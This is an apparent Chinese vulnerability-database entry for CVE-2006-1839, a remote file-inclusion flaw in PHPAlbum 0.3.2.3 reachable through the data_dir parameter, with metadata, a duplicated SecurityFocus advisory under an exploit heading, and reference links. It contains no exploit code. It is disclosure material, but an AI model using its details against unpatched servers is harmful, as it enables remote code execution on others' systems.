PHPAlbum Language.PHP 远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110072 漏洞类型 输入验证
发布时间 2006-04-15 更新时间 2008-11-05
CVE编号 CVE-2006-1839 CNNVD-ID CNNVD-200604-301
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/27643
https://www.securityfocus.com/bid/17526
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200604-301
|漏洞详情
当启用register_globals时,PHPAlbum0.3.2.3中的language.php中的PHP远程文件包含漏洞允许远程攻击者借助于data_dir参数中的FTPURL(满足了file_exists函数调用)执行任意代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/17526/info

phpAlbum is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. 

An attacker can exploit this issue to execute arbitrary remote PHP code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access. 

phpAlbum 0.3.2.3 and prior versions are affected.

phpAlbum is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. 

An attacker can exploit this issue to execute arbitrary remote PHP code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access. 

phpAlbum 0.3.2.3 and prior versions are affected.
|受影响的产品
phpAlbum.net phpalbum 0.3.2 .3 phpAlbum.net phpalbum 0.2.3 phpAlbum.net phpalbum 4.1
|参考资料

来源:BUGTRAQ
名称:20060415PHPAlbum<=0.3.2.3remotecommnadsexecution
链接:http://www.securityfocus.com/archive/1/archive/1/431067/100/0/threaded
来源:VUPEN
名称:ADV-2006-1382
链接:http://www.frsirt.com/english/advisories/2006/1382
来源:SECUNIA
名称:19661
链接:http://secunia.com/advisories/19661
来源:MISC
链接:http://retrogod.altervista.org/phpalbum_0323_incl_xpl.html
来源:XF
名称:phpalbum-language-file-include(25846)
链接:http://xforce.iss.net/xforce/xfdb/25846
来源:BID
名称:17526
链接:http://www.securityfocus.com/bid/17526
来源:OSVDB
名称:24741
链接:http://www.osvdb.org/24741